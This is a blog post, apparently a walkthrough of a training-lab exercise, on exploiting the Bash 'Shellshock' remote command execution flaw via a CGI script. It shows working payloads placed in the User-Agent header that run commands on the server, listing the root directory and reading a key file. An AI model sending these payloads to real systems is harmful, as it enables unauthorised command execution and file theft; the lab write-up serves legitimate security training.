zoukankan      html  css  js  c++  java
  • [ 墨者学院 ] 命令执行——Bash漏洞分析溯源

    0x00.题目描述:

    背景介绍

    安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。

    实训目标

    1、了解bash;

    2、了解Bash远程命令执行漏洞形成原因;

    3、了解Bash远程命令执行漏洞利用方法;

    解题方向

    找到poc.cgi文件

    0x01.题目分析:

    根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。

    参考连接

    freebuf:https://www.freebuf.com/vuls/44994.html

    Seebug:https://www.seebug.org/vuldb/ssvid-88877

    0x02.解题过程

    通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi

    构造执行语句插入到请求头的User-Agent头里面

    User-Agent: () { :;}; echo; /bin/ls /

    然后构造执行语句查看key.txt

    User-Agent: () { :;}; echo; /bin/cat /key.txt

  • 相关阅读:
    Redis学习小结
    抽屉模型
    用户提交数据的验证
    jsonp原理与实验
    文件上传
    项目
    CBV
    C++算法 线段树
    写一些奇怪的东西找到的奇怪的错误
    php安装过程出现的一些错误问题:
  • 原文地址:https://www.cnblogs.com/qtisec/p/11095444.html
Copyright © 2011-2022 走看看